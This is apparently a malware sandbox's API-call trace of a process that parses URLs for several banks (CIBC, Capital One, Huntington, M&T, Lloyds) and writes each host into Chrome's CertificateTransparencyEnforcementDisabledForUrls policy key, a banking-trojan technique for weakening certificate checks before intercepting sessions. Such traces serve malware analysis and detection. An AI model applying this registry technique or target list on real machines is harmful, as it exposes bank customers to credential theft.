	[0191.460] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.460] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.460] strstr (_Str="https://www.cibc.com/??/small-business*", _SubStr="https://") returned="https://www.cibc.com/??/small-business*"
	[0191.460] strncpy (in: _Dest=0x1dfa58, _Source="www.cibc.com/??/small-business*", _Count=0xc | out: _Dest="www.cibc.com") returned="www.cibc.com"
	[0191.461] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.461] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27e078 | out: hHeap=0x260000) returned 1
	[0191.461] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x270) returned 0x0
	[0191.461] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x278, lpdwDisposition=0x0) returned 0x0
	[0191.461] RegSetValueExA (in: hKey=0x278, lpValueName="2", Reserved=0x0, dwType=0x1, lpData="www.cibc.com", cbData=0xc | out: lpData="www.cibc.com") returned 0x0
	[0191.462] RegCloseKey (hKey=0x278) returned 0x0
	[0191.462] strstr (_Str="www.cibc.com", _SubStr="www.") returned="www.cibc.com"
	[0191.462] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x48) returned 0x277bc0
	[0191.462] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.462] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x274) returned 0x0
	[0191.462] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x27c, lpdwDisposition=0x0) returned 0x0
	[0191.462] RegSetValueExA (in: hKey=0x27c, lpValueName="3", Reserved=0x0, dwType=0x1, lpData="cibc.com", cbData=0x8 | out: lpData="cibc.com") returned 0x0
	[0191.463] RegCloseKey (hKey=0x27c) returned 0x0
	[0191.463] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.463] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.463] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.463] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.463] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.463] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.464] strstr (_Str="https://www.cibc.com/??/personal-banking*", _SubStr="https://") returned="https://www.cibc.com/??/personal-banking*"
	[0191.464] strncpy (in: _Dest=0x1dfa58, _Source="www.cibc.com/??/personal-banking*", _Count=0xc | out: _Dest="www.cibc.com") returned="www.cibc.com"
	[0191.464] strstr (_Str="www.cibc.com", _SubStr="www.") returned="www.cibc.com"
	[0191.464] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.464] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
	[0191.464] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0191.464] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.464] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.464] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.464] strstr (_Str="https://www.cibconline.cibc.com/ebm-resources/public/banking/cibc/client/web/*", _SubStr="https://") returned="https://www.cibconline.cibc.com/ebm-resources/public/banking/cibc/client/web/*"
	[0191.464] strncpy (in: _Dest=0x1dfa58, _Source="www.cibconline.cibc.com/ebm-resources/public/banking/cibc/client/web/*", _Count=0x17 | out: _Dest="www.cibconline.cibc.com") returned="www.cibconline.cibc.com"
	[0191.464] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.464] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x118cdd8
	[0191.464] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x277bc0 | out: hHeap=0x260000) returned 1
	[0191.464] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f268
	[0191.464] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x278) returned 0x0
	[0191.464] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x280, lpdwDisposition=0x0) returned 0x0
	[0191.464] RegSetValueExA (in: hKey=0x280, lpValueName="4", Reserved=0x0, dwType=0x1, lpData="www.cibconline.cibc.com", cbData=0x17 | out: lpData="www.cibconline.cibc.com") returned 0x0
	[0191.465] RegCloseKey (hKey=0x280) returned 0x0
	[0191.465] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.465] strstr (_Str="www.cibconline.cibc.com", _SubStr="www.") returned="www.cibconline.cibc.com"
	[0191.466] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.466] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x90) returned 0x33c168
	[0191.466] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x118cdd8 | out: hHeap=0x260000) returned 1
	[0191.466] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f448
	[0191.466] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x27c) returned 0x0
	[0191.466] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x284, lpdwDisposition=0x0) returned 0x0
	[0191.466] RegSetValueExA (in: hKey=0x284, lpValueName="5", Reserved=0x0, dwType=0x1, lpData="cibconline.cibc.com", cbData=0x13 | out: lpData="cibconline.cibc.com") returned 0x0
	[0191.467] RegCloseKey (hKey=0x284) returned 0x0
	[0191.467] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.467] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.467] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.467] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.467] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.467] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.467] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.467] strstr (_Str="https://www.cibconline.cibc.com/olbtxn/*", _SubStr="https://") returned="https://www.cibconline.cibc.com/olbtxn/*"
	[0191.467] strncpy (in: _Dest=0x1dfa58, _Source="www.cibconline.cibc.com/olbtxn/*", _Count=0x17 | out: _Dest="www.cibconline.cibc.com") returned="www.cibconline.cibc.com"
	[0191.467] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.467] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.467] strstr (_Str="www.cibconline.cibc.com", _SubStr="www.") returned="www.cibconline.cibc.com"
	[0191.467] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.467] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.467] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.467] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f588
	[0191.467] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f588 | out: hHeap=0x260000) returned 1
	[0191.467] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.467] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.467] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.467] strstr (_Str="https://*cibc.com/*", _SubStr="https://") returned="https://*cibc.com/*"
	[0191.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f588
	[0191.468] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f588 | out: hHeap=0x260000) returned 1
	[0191.468] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.468] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.468] strstr (_Str="*/rcrd/1550481775969129*", _SubStr="https://") returned 0x0
	[0191.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x70) returned 0x1182270
	[0191.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x70) returned 0x11821f8
	[0191.468] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11821f8 | out: hHeap=0x260000) returned 1
	[0191.468] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1182270 | out: hHeap=0x260000) returned 1
	[0191.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x70) returned 0x1182270
	[0191.468] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1182270 | out: hHeap=0x260000) returned 1
	[0191.468] strstr (_Str="https://intellix.capitalonebank.com/treasury-management-portal-web/appmanager/TresMgmtPortal/TreasuryManagement", _SubStr="https://") returned="https://intellix.capitalonebank.com/treasury-management-portal-web/appmanager/TresMgmtPortal/TreasuryManagement"
	[0191.468] strncpy (in: _Dest=0x1dfa58, _Source="intellix.capitalonebank.com/treasury-management-portal-web/appmanager/TresMgmtPortal/TreasuryManagement", _Count=0x1b | out: _Dest="intellix.capitalonebank.com") returned="intellix.capitalonebank.com"
	[0191.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f588
	[0191.468] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x280) returned 0x0
	[0191.468] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x288, lpdwDisposition=0x0) returned 0x0
	[0191.468] RegSetValueExA (in: hKey=0x288, lpValueName="6", Reserved=0x0, dwType=0x1, lpData="intellix.capitalonebank.com", cbData=0x1b | out: lpData="intellix.capitalonebank.com") returned 0x0
	[0191.469] RegCloseKey (hKey=0x288) returned 0x0
	[0191.469] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.469] strstr (_Str="intellix.capitalonebank.com", _SubStr="www.") returned 0x0
	[0191.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117ec50
	[0191.469] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117ec50 | out: hHeap=0x260000) returned 1
	[0191.469] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.469] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.469] strstr (_Str="*/rcrd/1550482343625533*", _SubStr="https://") returned 0x0
	[0191.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
	[0191.469] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0191.469] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.470] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.470] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.470] strstr (_Str="https://businessonline.huntington.com/BOLHome/BusinessOnlineLogin.aspx", _SubStr="https://") returned="https://businessonline.huntington.com/BOLHome/BusinessOnlineLogin.aspx"
	[0191.470] strncpy (in: _Dest=0x1dfa58, _Source="businessonline.huntington.com/BOLHome/BusinessOnlineLogin.aspx", _Count=0x1d | out: _Dest="businessonline.huntington.com") returned="businessonline.huntington.com"
	[0191.470] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.470] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xd8) returned 0x1179ad0
	[0191.470] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33c168 | out: hHeap=0x260000) returned 1
	[0191.470] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117ec50
	[0191.470] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x284) returned 0x0
	[0191.470] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x28c, lpdwDisposition=0x0) returned 0x0
	[0191.470] RegSetValueExA (in: hKey=0x28c, lpValueName="7", Reserved=0x0, dwType=0x1, lpData="businessonline.huntington.com", cbData=0x1d | out: lpData="businessonline.huntington.com") returned 0x0
	[0191.471] RegCloseKey (hKey=0x28c) returned 0x0
	[0191.471] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.471] strstr (_Str="businessonline.huntington.com", _SubStr="www.") returned 0x0
	[0191.471] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.471] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f010
	[0191.471] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f010 | out: hHeap=0x260000) returned 1
	[0191.471] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.471] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.471] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.471] strstr (_Str="*/rcrd/1536176590679564*", _SubStr="https://") returned 0x0
	[0191.471] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.471] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.471] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.471] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.471] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.471] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.471] strstr (_Str="https://onlinebanking.mtb.com/Login/MTBSignOn", _SubStr="https://") returned="https://onlinebanking.mtb.com/Login/MTBSignOn"
	[0191.471] strncpy (in: _Dest=0x1dfa58, _Source="onlinebanking.mtb.com/Login/MTBSignOn", _Count=0x15 | out: _Dest="onlinebanking.mtb.comgton.com") returned="onlinebanking.mtb.comgton.com"
	[0191.471] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.471] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f010
	[0191.472] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x288) returned 0x0
	[0191.472] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x290, lpdwDisposition=0x0) returned 0x0
	[0191.472] RegSetValueExA (in: hKey=0x290, lpValueName="8", Reserved=0x0, dwType=0x1, lpData="onlinebanking.mtb.com", cbData=0x15 | out: lpData="onlinebanking.mtb.com") returned 0x0
	[0191.473] RegCloseKey (hKey=0x290) returned 0x0
	[0191.473] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.473] strstr (_Str="onlinebanking.mtb.com", _SubStr="www.") returned 0x0
	[0191.473] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.473] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f1f0
	[0191.473] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f1f0 | out: hHeap=0x260000) returned 1
	[0191.473] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.473] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.473] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.473] strstr (_Str="https://onlinebanking.mtb.com/", _SubStr="https://") returned="https://onlinebanking.mtb.com/"
	[0191.473] strncpy (in: _Dest=0x1dfa58, _Source="onlinebanking.mtb.com/", _Count=0x15 | out: _Dest="onlinebanking.mtb.com") returned="onlinebanking.mtb.com"
	[0191.473] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.473] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.473] strstr (_Str="onlinebanking.mtb.com", _SubStr="www.") returned 0x0
	[0191.473] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.473] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.473] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.473] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.473] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.473] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.473] strstr (_Str="https://onlinebanking.mtb.com/Accounts/AccountSummary", _SubStr="https://") returned="https://onlinebanking.mtb.com/Accounts/AccountSummary"
	[0191.473] strncpy (in: _Dest=0x1dfa58, _Source="onlinebanking.mtb.com/Accounts/AccountSummary", _Count=0x15 | out: _Dest="onlinebanking.mtb.com") returned="onlinebanking.mtb.com"
	[0191.473] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.474] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.474] strstr (_Str="onlinebanking.mtb.com", _SubStr="www.") returned 0x0
	[0191.474] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.474] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.474] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.474] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.474] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.474] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.474] strstr (_Str="https://onlinebanking.mtb.com/CustomerService/MyProfile", _SubStr="https://") returned="https://onlinebanking.mtb.com/CustomerService/MyProfile"
	[0191.474] strncpy (in: _Dest=0x1dfa58, _Source="onlinebanking.mtb.com/CustomerService/MyProfile", _Count=0x15 | out: _Dest="onlinebanking.mtb.com") returned="onlinebanking.mtb.com"
	[0191.474] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.474] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.474] strstr (_Str="onlinebanking.mtb.com", _SubStr="www.") returned 0x0
	[0191.474] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.474] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.474] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.474] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.474] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.474] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.474] strstr (_Str="https://onlinebanking.mtb.com/CustomerService/MyProfileEdit", _SubStr="https://") returned="https://onlinebanking.mtb.com/CustomerService/MyProfileEdit"
	[0191.474] strncpy (in: _Dest=0x1dfa58, _Source="onlinebanking.mtb.com/CustomerService/MyProfileEdit", _Count=0x15 | out: _Dest="onlinebanking.mtb.com") returned="onlinebanking.mtb.com"
	[0191.474] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.474] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.474] strstr (_Str="onlinebanking.mtb.com", _SubStr="www.") returned 0x0
	[0191.474] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.475] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f1f0
	[0191.475] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f1f0 | out: hHeap=0x260000) returned 1
	[0191.475] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.475] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.475] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.475] strstr (_Str="*/rcrd/1534870214732286*", _SubStr="https://") returned 0x0
	[0191.475] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.475] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.475] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.475] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.475] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.475] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.475] strstr (_Str="https://online.lloydsbank.co.uk/personal/primarylogin", _SubStr="https://") returned="https://online.lloydsbank.co.uk/personal/primarylogin"
	[0191.475] strncpy (in: _Dest=0x1dfa58, _Source="online.lloydsbank.co.uk/personal/primarylogin", _Count=0x17 | out: _Dest="online.lloydsbank.co.ukon.com") returned="online.lloydsbank.co.ukon.com"
	[0191.475] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.475] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f1f0
	[0191.475] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x28c) returned 0x0
	[0191.475] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x294, lpdwDisposition=0x0) returned 0x0
	[0191.476] RegSetValueExA (in: hKey=0x294, lpValueName="9", Reserved=0x0, dwType=0x1, lpData="online.lloydsbank.co.uk", cbData=0x17 | out: lpData="online.lloydsbank.co.uk") returned 0x0
	[0191.476] RegCloseKey (hKey=0x294) returned 0x0
	[0191.476] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.476] strstr (_Str="online.lloydsbank.co.uk", _SubStr="www.") returned 0x0
	[0191.476] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.476] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
